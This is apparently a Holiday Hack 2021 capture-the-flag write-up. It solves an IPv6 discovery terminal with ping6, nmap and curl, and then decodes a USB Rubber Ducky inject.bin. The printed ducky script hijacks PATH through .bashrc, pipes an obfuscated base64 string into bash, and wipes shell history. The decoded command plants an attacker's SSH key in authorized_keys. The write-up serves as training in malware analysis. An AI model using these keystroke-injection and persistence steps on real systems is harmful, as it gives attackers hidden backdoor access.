Holiday Hack 2021: Strange USB Device

• Holiday Hack 2021
• 1) KringleCon Orientation
• 2) Where in the World is Caramel Santaigo?
• 3) Thaw Frost Tower's Entrace
• 4) Slot Machine Investigation
• 5) Strange USB Device
• 6) Shellcode Primer
• 7) Printer Exploitation
• 8) Kerberoasting on an Open Fire
• 9) Splunk!
• 10) Now Hiring!
• 11) Customer Complaint Analysis
• 12) Frost Tower Website Checkup
• 13) FPGA Programming
• Appendix A: Log4j Terminals

Objective

Terminal - IPv6 Sandbox

Challenge

Just off the Santavator on the Talks floor at KringleCon I’ll find Jewel Loggins with a Pi terminal:

Well hello! I’m Jewel Loggins.

I have to say though, I’m a bit distressed.

The con next door? Oh sure, I’m concerned about that too, but I was talking about the issues I’m having with IPv6.

I mean, I know it’s an old protocol now, but I’ve just never checked it out.

So now I’m trying to do simple things like Nmap and cURL using IPv6, and I can’t quite get them working!

Would you mind taking a look for me on this terminal?

I think there’s a Github Gist that covers tool usage with IPv6 targets.

The tricky parts are knowing when to use [] around IPv6 addresses and where to specify the source interface.

I’ve got a deal for you. If you show me how to solve this terminal, I’ll provide you with some nice tips about a topic I’ve been researching a lot lately – Ducky Scripts! They can be really interesting and fun!

He also unlocks a hint in my badge:

• Check out this Github Gist with common tools used in an IPv6 context.

The challenge is to find the host in the network that is hosting the password:

Tools:

* netcat
* nmap
* ping / ping6
* curl

Welcome, Kringlecon attendee! The candy striper is running as a service on
this terminal, but I can't remember the password. Like a sticky note under the
keyboard, I put the password on another machine in this network. Problem is: I
don't have the IP address of that other host.
Please do what you can to help me out. Find the other machine, retrieve the
password, and enter it into the Candy Striper in the pane above. I know you
can get it running again!

Solution

Given the terminal name and the tools identified, it seems clear I need to find the host using IPv6.

I’ll start with an IPv6 ping to the network broadcast address:

elf@14a2a210f8d8:~$ ping6 ff02::1 -c2
PING ff02::1(ff02::1) 56 data bytes
64 bytes from fe80::42:c0ff:fea8:a003%eth0: icmp_seq=1 ttl=64 time=0.035 ms
64 bytes from fe80::42:4cff:fe7b:61fe%eth0: icmp_seq=1 ttl=64 time=0.066 ms (DUP!)
64 bytes from fe80::42:c0ff:fea8:a002%eth0: icmp_seq=1 ttl=64 time=0.081 ms (DUP!)
64 bytes from fe80::42:c0ff:fea8:a003%eth0: icmp_seq=2 ttl=64 time=0.046 ms

--- ff02::1 ping statistics ---
2 packets transmitted, 2 received, +2 duplicates, 0% packet loss, time 22ms
rtt min/avg/max/mdev = 0.035/0.057/0.081/0.017 ms

I’ll try to scaneach of those with nmap (using the -6 flag and with the interface specified by %eth0), and two have open ports:

elf@be5d924ce4f3:~$ nmap -6 fe80::42:c0ff:fea8:a003%eth0
Starting Nmap 7.70 ( https://nmap.org ) at 2022-01-06 18:39 UTC
Nmap scan report for fe80::42:c0ff:fea8:a003
Host is up (0.000080s latency).
All 1000 scanned ports on fe80::42:c0ff:fea8:a003 are closed

Nmap done: 1 IP address (1 host up) scanned in 13.05 seconds
elf@be5d924ce4f3:~$ nmap -6 fe80::42:4cff:fe7b:61fe%eth0
Starting Nmap 7.70 ( https://nmap.org ) at 2022-01-06 18:39 UTC
Nmap scan report for fe80::42:4cff:fe7b:61fe
Host is up (0.00011s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp

Nmap done: 1 IP address (1 host up) scanned in 13.05 seconds
elf@be5d924ce4f3:~$ nmap -6 fe80::42:c0ff:fea8:a002%eth0
Starting Nmap 7.70 ( https://nmap.org ) at 2022-01-06 18:40 UTC
Nmap scan report for fe80::42:c0ff:fea8:a002
Host is up (0.000092s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
80/tcp   open  http
9000/tcp open  cslistener

Nmap done: 1 IP address (1 host up) scanned in 13.05 seconds

The first one seems to be the terminal emulator itself:

elf@be5d924ce4f3:~$ curl http://[fe80::42:4cff:fe7b:61fe]:3000/ --interface eth0
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <link rel="icon" type="image/x-icon" href="/favicon.ico">
    <title>WeTTy - The Web Terminal Emulator</title>
    <link rel="stylesheet" href="/assets/css/styles.css" />
<link rel="stylesheet" href="/assets/css/options.css" />
<link rel="stylesheet" href="/assets/css/overlay.css" />
<link rel="stylesheet" href="/assets/css/terminal.css" />
  </head>
  <body>
    <div id="overlay">
      <div class="error">
        <div id="msg"></div>
        <input type="button" onclick="location.reload();" value="reconnect" />
      </div>
    </div>
    <div id="terminal"></div>
    <script type="module" src="/client/wetty.js"></script>
    <script src="/client/shared/conduit.js"></script>
  </body>
</html>

The other one confirms I’m in the right place:

elf@be5d924ce4f3:~$ curl http://[fe80::42:c0ff:fea8:a002]/ --interface eth0
<html>
<head><title>Candy Striper v6</title></head>
<body>
<marquee>Connect to the other open TCP port to get the striper's activation phrase!</marquee>
</body>
</html>

Hitting it on port 9000 returns the password:

elf@be5d924ce4f3:~$ curl http://[fe80::42:c0ff:fea8:a002]:9000/ --interface eth0
PieceOnEarth

Entering that solves the terminal.

Slot Machine Investigation

Hints

Happy to see the Candy Striper working again, Jewel provides hints:

Great work! It seems simpler now that I’ve seen it once. Thanks for showing me!

Prof. Petabyte warned us about random USB devices. They might be malicious keystroke injectors!

A troll could program a keystroke injector to deliver malicious keystrokes when it is plugged in.

Ducky Script is a language used to specify those keystrokes.

What commands would a troll try to run on our workstations?

I heard that SSH keys can be used as backdoors. Maybe that’s useful?

He also unlocks four hints in the badge:

• Ducky Script is the language for the USB Rubber Ducky
• Attackers can encode Ducky Script using a duck encoder for delivery as inject.bin.
• It’s also possible the reverse engineer encoded Ducky Script using Mallard.
• The MITRE ATT&CK™ tactic T1098.004 describes SSH persistence techniques through authorized keys files.

Challenge

Morcel Nougat and the Strange USB Device are in the Speaker _Un_Preparedness room at the end of the talks hall:

Hello and welcome to the speaker _Un_Preparedness Room!

I’m Morcel Nougat, elf extraordinaire.

I’ve heard the talks at the other con across the way are a bit… off.

I’ve heard the talks at the other con across the way are a bit… off.

I really don’t think they have the right sense about what makes for a wonderful holiday season. But, anyway!

Say, do you know anything about USB Rubber Duckies?

I’ve been playing around with them a bit myself.

Please see what you can do to help solve the Rubber Ducky Objective!

Oh, and if you need help, I hear Jewel Loggins, on this floor outside this room, has some experience.

The terminal gives the details of what to do:

A random USB device, oh what could be the matter?
It seems a troll has left this, right on a silver platter.
Oh my friend I need your ken, this does not smell of attar.
Help solve this challenge quick quick, I shall offer no more natter.

Evaluate the USB data in /mnt/USBDEVICE.A random USB device, oh what could be the matter?
It seems a troll has left this, right on a silver platter.
Oh my friend I need your ken, this does not smell of attar.
Help solve this challenge quick quick, I shall offer no more natter.

Evaluate the USB data in /mnt/USBDEVICE.

Solution

Get Ducky Script

In the home directory, there’s a single script, mallard.py:

elf@bc26d16160e2:~$ ls  
mallard.py*

This was mentioned in the hints as a way to decode RubberDucky’s command language.

A Rubber Ducky is a USB device designed to execute simple scripts to inject keystrokes and mouse clicks into a machine when it is inserted.

In /mnt/USBDEVICE there’s a single inject.bin file:

elf@bc26d16160e2:/mnt/USBDEVICE$ ls
inject.bin

mallard.py seems to take a -f [file]:

elf@bc26d16160e2:~$ python3 mallard.py 
usage: mallard.py [-h] [--file FILE] [--no_analyze] [--output_file OUTPUT_FILE]
                  [--analysis_file ANALYSIS_FILE] [--debug]

optional arguments:
  -h, --help            show this help message and exit
  --file FILE, -f FILE  The file to decode, default: inject.bin
  --no_analyze, -A      Include this switch to turn off analysis of the duckyfile
  --output_file OUTPUT_FILE, -o OUTPUT_FILE
                        File to save decoded ducky script to. Default will print duckyfile to
                        screen.
  --analysis_file ANALYSIS_FILE
                        Location to output analysis. Default will print analysis to screen.
  --debug               Enable Debug Logging.

Running it with that prints out the ducky-script:

elf@bc26d16160e2:~$ python3 mallard.py -f /mnt/USBDEVICE/inject.bin
...[snip]...
STRING echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc
ENTER
DELAY 200
STRING echo ==gCzlXZr9FZlpXay9Ga0VXYvg2cz5yL+BiP+AyJt92YuIXZ39Gd0N3byZ2ajFmau4WdmxGbvJHdAB3bvd2Ytl3ajlGILFESV1mWVN2SChVYTp1VhNlRyQ1UkdFZopkbS1EbHpFSwdlVRJlRVNFdwM2SGVEZnRTaihmVXJ2ZRhVWvJFSJBTOtJ2ZV12YuVlMkd2dTVGb0dUSJ5UMVdGNXl1ZrhkYzZ0ValnQDRmd1cUS6x2RJpHbHFWVClHZOpVVTpnWwQFdSdEVIJlRS9GZyoVcKJTVzwWMkBDcWFGdW1GZvJFSTJHZIdlWKhkU14UbVBSYzJXLoN3cnAyboNWZ | rev | base64 -d | bash
ENTER
DELAY 600
STRING history -c && rm .bash_history && exit
ENTER
DELAY 600
GUI q

Analyze Duck Script

I’ll look at the full Ducky Script in this video:

To find the flag, at the end of the script, there’s these lines:

STRING echo ==gCzlXZr9FZlpXay9Ga0VXYvg2cz5yL+BiP+AyJt92YuIXZ39Gd0N3byZ2ajFmau4WdmxGbvJHdAB3bvd2Ytl3ajlGILFESV1mWVN2SChVYTp1VhNlRyQ1UkdFZopkbS1EbHpFSwdlVRJlRVNFdwM2SGVEZnRTaihmVXJ2ZRhVWvJFSJBTOtJ2ZV12YuVlMkd2dTVGb0dUSJ5UMVdGNXl1ZrhkYzZ0ValnQDRmd1cUS6x2RJpHbHFWVClHZOpVVTpnWwQFdSdEVIJlRS9GZyoVcKJTVzwWMkBDcWFGdW1GZvJFSTJHZIdlWKhkU14UbVBSYzJXLoN3cnAyboNWZ | rev | base64 -d | bash
ENTER
DELAY 600

It’s sending that string into rev then base64 -d then bash. In my own terminal, I’ll decode that:

elf@bc26d16160e2:~$ echo "==gCzlXZr9FZlpXay9Ga0VXYvg2cz5yL+BiP+AyJt92YuIXZ39Gd0N3byZ2ajFmau4WdmxGbvJHdAB3bvd2Ytl3ajlGILFESV1mWVN2SChVYTp1VhNlRyQ1UkdFZopkbS1EbHpFSwdlVRJlRVNFdwM2SGVEZnRTaihmVXJ2ZRhVWvJFSJBTOtJ2ZV12YuVlMkd2dTVGb0dUSJ5UMVdGNXl1ZrhkYzZ0ValnQDRmd1cUS6x2RJpHbHFWVClHZOpVVTpnWwQFdSdEVIJlRS9GZyoVcKJTVzwWMkBDcWFGdW1GZvJFSTJHZIdlWKhkU14UbVBSYzJXLoN3cnAyboNWZ" | rev | base64 -d
echo 'ssh-rsa UmN5RHJZWHdrSHRodmVtaVp0d1l3U2JqZ2doRFRHTGRtT0ZzSUZNdyBUaGlzIGlzIG5vdCByZWFsbHkgYW4gU1NIIGtleSwgd2UncmUgbm90IHRoYXQgbWVhbi4gdEFKc0tSUFRQVWpHZGlMRnJhdWdST2FSaWZSaXBKcUZmUHAK ickymcgoop@trollfun.jackfrosttower.com' >> ~/.ssh/authorized_keys

This is writing an SSH key for ickymcgoop into the authorized_keys file for elf, providing persistent access.

Flag: ickymcgoop

« 4) Slot Machine Investigation6) Shellcode Primer »